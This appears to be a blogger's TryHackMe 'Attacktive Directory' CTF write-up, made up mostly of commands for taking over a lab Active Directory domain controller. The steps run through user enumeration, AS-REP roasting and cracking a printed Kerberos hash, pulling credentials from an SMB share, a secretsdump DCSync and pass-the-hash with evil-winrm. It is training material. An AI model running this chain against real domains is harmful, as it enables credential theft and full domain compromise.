Attacktive Directory THM Writeup

Python3 -m pip install impacket
Python3 -m pip install .
sudo nmap -sV -O 10.10.118.181
enum4linux 10.10.118.181
./kerbrute_linux_amd64 userenum -d spookysec.local --dc 10.10.118.181 ../Wordlists/userlist.txt
cd /home/kali/Downloads/impacket-master/build/scripts-3.9./GetNPUsers.py spookysec.local/svc-admin -no-pass
cd /home/kali/Downloads/Wordlistshashcat -m 18200 ‘$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:479e4f94a068ef144a788436c7df94e7$7a05e6b2e85dff303406c56f1c85feefe6ea6b5fbbe6a9d9cc59cf190add2502d2b8906eabe9d1f6a49cf90a707f94118477754fc7c04c2644824d35d25b11ee5dcc1bb519b78367d172374fdab521fb236fbd0f4dccb6d3f3a9a7c5ea0b1223a7a29adc38665abb144feff9f0b539b26f2f32d49d0a6820fd05c6b64ffe611df26d0adb0d05b7eab01639cdfc2d7ffaab92e94c7c077eaeeef14e9ce69d4088aabba32f6bb8c10235e0b03c496c409257c64d839e397e9c979346557f0d675cdb9f97224ba0954be9540f91cd7ea7be20ea745a9bf393807201ff9ff2685ac1f801dd77d2c049249f34a3e6509be3eb821b’ -a 3 rockyou.txt
rdesktop 10.10.118.181
smbclient -L \\\\10.10.118.181 -U ‘svc-admin’
smbclient \\\\10.10.118.181\\backup -U ‘svc-admin’
more backup_credentials.txt
echo <string> | base64 -d
(Get-Acl ‘dc=spookysec,dc=local’).access | Where {$_.IdentityReference -like “*backup*”}
python3 /home/kali/Downloads/impacket-master/examples/secretsdump.py -just-dc <username>:<password>@10.10.118.181
NTLM hashes redacted as per THM’s writeup guidance
sudo gem install evil-winrm(alt: sudo apt install evil-winrm)
evil-winrm -i <target IP> -u <username> -H <hash>
Set-Location ..\Desktop
Get-ChildItem
Get-Content root.txt
NTLM hash & flag redacted as per THM’s writeup guidance
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties * | Select-Object SAMAccountName

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rich

Rich

15 Followers

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from work or the lab.